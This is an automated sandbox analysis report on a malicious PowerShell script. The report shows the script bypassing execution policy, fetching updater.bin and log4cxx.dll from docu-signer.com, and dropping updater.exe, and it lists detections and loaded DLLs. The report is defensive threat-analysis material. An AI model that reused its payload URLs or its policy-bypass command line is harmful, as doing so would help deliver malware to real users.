Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SFHgtxFGtB.ps1

Overview

General Information

Sample name:SFHgtxFGtB.ps1
Analysis ID:1576522
MD5:6a34a3dbed524eed6d73c72188418d80
SHA1:6a6ee1aa6ad9d9fbd7b7112df3a5c92b83c18667
SHA256:45ab4ca2483759d89bc446e6797e86489eb08cfeb3f740440a83ff6d83eb5503
Tags:docu-signer-comps1user-JAMESWT_MHT
Infos:

Detection

Score:48
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected suspicious sample
Powershell drops PE file
Contains long sleeps (>= 3 min)
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file overlay found
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • powershell.exe (PID: 4548 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\SFHgtxFGtB.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 3364 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

System Summary

barindex
Sigma detected: Change PowerShell Policies to an Insecure Level
Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\SFHgtxFGtB.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\SFHgtxFGtB.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\SFHgtxFGtB.ps1", ProcessId: 4548, ProcessName: powershell.exe
Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\SFHgtxFGtB.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\SFHgtxFGtB.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\SFHgtxFGtB.ps1", ProcessId: 4548, ProcessName: powershell.exe

Suricata Signatures

TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-12-17T08:24:41.038991+010028032742Potentially Bad Traffic192.168.2.749700104.21.87.65443TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 96.7% probability
Source: unknownHTTPS traffic detected: 104.21.87.65:443 -> 192.168.2.7:49699 version: TLS 1.2
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.1417254390.00000225043F3000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1446816455.000002251E81A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000000.00000002.1446816455.000002251E7A0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000000.00000002.1446816455.000002251E81A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdb source: powershell.exe, 00000000.00000002.1447996479.000002251E8BB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdb source: powershell.exe, 00000000.00000002.1446215175.000002251E593000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.1446816455.000002251E7A0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.1446816455.000002251E7A0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbppDagb source: powershell.exe, 00000000.00000002.1447996479.000002251E8DA000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbECd source: powershell.exe, 00000000.00000002.1446816455.000002251E7A0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.1446215175.000002251E593000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbsk\D source: powershell.exe, 00000000.00000002.1447996479.000002251E8DA000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49700 -> 104.21.87.65:443
Source: global trafficHTTP traffic detected: GET /api/uz/0912545164/updater.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: docu-signer.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /api/uz/0912545164/log4cxx.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: docu-signer.com
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /api/uz/0912545164/updater.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: docu-signer.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /api/uz/0912545164/log4cxx.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: docu-signer.com
Source: global trafficDNS traffic detected: DNS query: docu-signer.com
Source: powershell.exe, 00000000.00000002.1417937766.00000225073C5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1417937766.0000022507151000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docu-signer.com
Source: powershell.exe, 00000000.00000002.1440811136.00000225167EF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1440811136.00000225166B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000000.00000002.1417937766.0000022506718000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000000.00000002.1417937766.00000225064F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000000.00000002.1417937766.0000022506718000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: updater.exe.0.drString found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: powershell.exe, 00000000.00000002.1417937766.00000225064F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000000.00000002.1440811136.00000225166B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000000.00000002.1440811136.00000225166B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000000.00000002.1440811136.00000225166B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000000.00000002.1417937766.00000225083C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docu-signer.co
Source: powershell.exe, 00000000.00000002.1417937766.00000225083C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1417937766.0000022507392000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1417937766.000002250707E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docu-signer.com
Source: powershell.exe, 00000000.00000002.1417937766.00000225083C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docu-signer.com/ap
Source: powershell.exe, 00000000.00000002.1417937766.00000225083C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docu-signer.com/api
Source: powershell.exe, 00000000.00000002.1417937766.00000225083C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docu-signer.com/api/uz
Source: powershell.exe, 00000000.00000002.1417937766.00000225083C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docu-signer.com/api/uz/
Source: powershell.exe, 00000000.00000002.1417937766.00000225083C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docu-signer.com/api/uz/091
Source: powershell.exe, 00000000.00000002.1417937766.00000225083C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docu-signer.com/api/uz/0912
Source: powershell.exe, 00000000.00000002.1417937766.00000225083C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docu-signer.com/api/uz/0912(
Source: powershell.exe, 00000000.00000002.1417937766.00000225083C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docu-signer.com/api/uz/0912545
Source: powershell.exe, 00000000.00000002.1417937766.00000225083C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docu-signer.com/api/uz/09125451
Source: powershell.exe, 00000000.00000002.1417937766.00000225083C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docu-signer.com/api/uz/0912545164/
Source: powershell.exe, 00000000.00000002.1417937766.00000225083C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docu-signer.com/api/uz/0912545164/l
Source: powershell.exe, 00000000.00000002.1417937766.00000225083C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docu-signer.com/api/uz/0912545164/l8
Source: powershell.exe, 00000000.00000002.1417937766.00000225083C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docu-signer.com/api/uz/0912545164/log4c
Source: powershell.exe, 00000000.00000002.1417937766.00000225083C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docu-signer.com/api/uz/0912545164/log4c(
Source: powershell.exe, 00000000.00000002.1417937766.00000225083C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docu-signer.com/api/uz/0912545164/log4cxx.d0
Source: powershell.exe, 00000000.00000002.1417937766.00000225083C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docu-signer.com/api/uz/0912545164/log4cxx.dH
Source: powershell.exe, 00000000.00000002.1417937766.0000022506718000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docu-signer.com/api/uz/0912545164/log4cxx.dll
Source: powershell.exe, 00000000.00000002.1417937766.00000225083C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docu-signer.com/api/uz/0912545164/upda
Source: powershell.exe, 00000000.00000002.1417937766.00000225083C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docu-signer.com/api/uz/0912545164/updater.
Source: powershell.exe, 00000000.00000002.1417937766.00000225083C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1417937766.000002250707E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1417937766.0000022506718000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docu-signer.com/api/uz/0912545164/updater.bin
Source: powershell.exe, 00000000.00000002.1417937766.0000022506718000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docu-signer.com/api/uz/0912545164/updater.bin)
Source: powershell.exe, 00000000.00000002.1417937766.00000225083C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docu-signer.cox
Source: powershell.exe, 00000000.00000002.1417937766.0000022506718000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000000.00000002.1417937766.00000225077FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
Source: powershell.exe, 00000000.00000002.1440811136.00000225167EF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1440811136.00000225166B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
Source: unknownHTTPS traffic detected: 104.21.87.65:443 -> 192.168.2.7:49699 version: TLS 1.2

System Summary

barindex
Powershell drops PE file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\52821801\updater.exeJump to dropped file
Source: updater.exe.0.drStatic PE information: Data appended to the last section found
Source: classification engineClassification label: mal48.winPS1@3/7@1/1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3364:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ywhbt5jh.f3f.ps1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\SFHgtxFGtB.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.1417254390.00000225043F3000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1446816455.000002251E81A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000000.00000002.1446816455.000002251E7A0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000000.00000002.1446816455.000002251E81A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdb source: powershell.exe, 00000000.00000002.1447996479.000002251E8BB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdb source: powershell.exe, 00000000.00000002.1446215175.000002251E593000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.1446816455.000002251E7A0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.1446816455.000002251E7A0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbppDagb source: powershell.exe, 00000000.00000002.1447996479.000002251E8DA000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbECd source: powershell.exe, 00000000.00000002.1446816455.000002251E7A0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.1446215175.000002251E593000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbsk\D source: powershell.exe, 00000000.00000002.1447996479.000002251E8DA000.00000004.00000020.00020000.00000000.sdmp
Source: updater.exe.0.drStatic PE information: real checksum: 0xdf890 should be: 0xd6a64
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFAAC466FAB push ebx; iretd 0_2_00007FFAAC466FCA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFAAC466FCB push ebx; iretd 0_2_00007FFAAC466FCA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\52821801\updater.exeJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
